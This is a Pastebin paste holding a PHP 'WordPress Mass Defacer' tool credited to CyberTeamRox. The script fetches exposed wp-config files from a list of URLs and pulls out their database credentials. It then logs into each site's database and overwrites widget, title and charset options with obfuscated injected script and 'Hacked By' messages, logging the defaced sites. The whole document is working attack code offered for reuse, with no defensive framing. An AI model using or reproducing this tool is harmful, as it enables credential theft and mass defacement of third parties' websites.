zeeshan-haxor-zesn

WordPress Mass Defacer | CyberTeamRox

Dec 23rd, 2016
332
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.54 KB | None | 0 0
  1. <?php
  2. /**
  3. * @fb : https://www.facebook.com/Cyberteamrox3/
  4. * @contact: https://www.facebook.com/zee.gov
  5. */
  6.  
  7. set_time_limit(0);
  8. ini_set('display_errors', 0);
  9.  
  10. echo '<html><head>
  11. <title>WordPress Mass Defacer | CyberTeamRox</title>
  12. <meta content="text/html; charset=utf-8">
  13. <meta name="keywords" content="WordPress Mass Defacer | CyberTeamRox" />
  14. <meta name="description" content="WordPress Mass Defacer | CyberTeamRox" />
  15. <link href="https://pbs.twimg.com/profile_images/576236156573995008/MBmY1005.jpg" rel="SHORTCUT ICON" />
  16. <meta name="author" content="Zeeshan Haxor" />
  17. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
  18. <style type="text/css">body { background: url("http://p1.pichost.me/i/13/1360479.jpgg") bottom right no-repeat fixed; background-color:black; td {text-color:white; text-align: center;font-family:Pirata One; text-shadow: 3px 3px 3px red;}</style>
  19. </head><body>';
  20. echo '<center><div style="text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0); color: rgb(255, 255, 255); font-weight: bold;"><font style="color:yellow;size="2";text-align: center;font-family:Pirata One; text-shadow: 3px 3px 3px yellow;">WordPress Mass Defacer<br><sub>CyberTeamRox</sub></div><br/><img src="https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcQJLjYMEd-uAlqgf_RPIGxFcrcVJtvQ3BSERUbp2GVbby3Tc3s8"></center><br>';
  21.  
  22. echo '<form method="POST" action="" ><center><table border="1">
  23. <tr><td style="color: rgb(255, 255, 255);" >Config List:</td><td><textarea name="url" cols="50" rows="10" ></textarea></td></tr>
  24. <tr><td style="color: rgb(255, 255, 255);">Deface :</td><td><textarea name="index" cols="50" rows="10" ></textarea></td></tr></table>
  25. <br><input type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
  26.  
  27. if ($_POST['action']=='1'){
  28. if ($_POST['url']==''){
  29. echo "<center><div class='result'>No Config Found! <br>Make sure you provided a config list!</div><br>";
  30. }else{
  31. $url=$_POST['url'];
  32. $users = explode("\n",$url);
  33. foreach ($users as $user) {
  34. $user1=trim($user);
  35. $code=file_get_contents2($user1);
  36. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
  37. $db=$b1[1][0];
  38. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
  39. $user=$b2[1][0];
  40. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
  41. $db_password=$b3[1][0];
  42. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
  43. $host=$b4[1][0];
  44. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
  45. $p=$b5[1][0];
  46.  
  47. $d=@mysql_connect( $host, $user, $db_password ) ;
  48. if ($d){
  49. @mysql_select_db($db );
  50. $source=stripslashes($_POST['index']);
  51. $s2=strToHex(($source));
  52. $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
  53. $ls=strlen($s)-2;
  54. $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
  55. mysql_query($sql) ;
  56. $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
  57. mysql_query($sql) ;
  58. if (function_exists("mb_convert_encoding") )
  59. {
  60. $source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
  61. $source2=mysql_real_escape_string($source2);
  62. $sql = "UPDATE `".$p."options` SET `option_value` = 'Hacked By Zeeshan Haxor || CyberTeamRox' WHERE `option_name` = 'blogname';"; // Change to your Nick
  63. @mysql_query($sql) ; ;
  64. $sql = "UPDATE `".$p."options` SET `option_value` = 'Hacked by Zeeshan Haxor' WHERE `option_name` = 'blogdescription';"; // Change to your Nick
  65. @mysql_query($sql) ; ;
  66. $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
  67. @mysql_query($sql) ; ;
  68. }
  69. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
  70. $siteurl=@mysql_fetch_array($aa) ;
  71. $siteurl=$siteurl['option_value'];
  72. $tr.="$siteurl\n";
  73. mysql_close();
  74. }
  75. }
  76. if ($tr)
  77. $filename = 'list.txt';
  78. $fp = fopen($filename, "a+");
  79. $write = fputs($fp, $tr);
  80. fclose($fp);
  81. echo "<center><div class='result'>Defacing Completed 1337 xd ! :)<br><br>";
  82. echo "<center><a href='list.txt' target='_blank'>View List of Defaced Sites</a></div><br/>";
  83. echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
  84. }
  85. }
  86.  
  87. function strToHex($string)
  88. {
  89. $hex='';
  90. for ($i=0; $i < strlen($string); $i++)
  91. {
  92. if (strlen(dechex(ord($string[$i])))==1){
  93. $hex .="%0". dechex(ord($string[$i]));
  94. }
  95. else
  96. {
  97. $hex .="%". dechex(ord($string[$i]));
  98. }
  99. }
  100. return $hex;
  101. }
  102.  
  103. function file_get_contents2($u){
  104.  
  105. $ch = curl_init();
  106. curl_setopt($ch,CURLOPT_URL,$u);
  107. curl_setopt($ch, CURLOPT_HEADER, 0);
  108. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  109. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
  110. $result = curl_exec($ch);
  111. return $result ;
  112. }
  113. echo "<center><br><br>&#169; Zeeshan Haxor || CyberTeamRox ";
  114. ?>
Add Comment
Please, Sign In to add comment